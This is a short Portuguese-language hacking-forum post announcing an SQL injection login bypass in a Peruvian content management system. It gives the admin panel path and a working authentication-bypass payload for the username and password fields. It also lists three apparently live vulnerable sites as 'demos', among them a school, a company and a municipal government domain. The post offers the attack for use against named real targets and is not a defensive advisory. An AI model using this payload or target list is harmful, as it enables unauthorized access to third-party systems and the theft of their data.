CMS | Publinet - SQL Injection POST

#1
Olá sou Malokin_, integrante da PRdV Team, hoje vou lançar aqui pra vocês um CMS Peruano, vulnerável a SQL Injection POST ( formulários )
- Falha no CMS descoberta por Malokin_ !

CMS : https://www.publinet.com.pe/

[#] URL Painel Administrativo : /panel/
PoC :
usuário : '=' 'or'
senha : '=' 'or'

Referência Sobre bypass em forms de login, manipulando o SQL Query, caso queiram entender mais a fundo do assunto : http://www.securityidiots.com/Web-Pente ... ction.html

DEMOS :
https://www.imamgelcaballero.edu.pe/panel/
https://www.indeesac.com/panel/
https://www.muniyuracmarca.gob.pe/panel/

Me Siga no Twitter - @MalokinSecurity
1 x
cron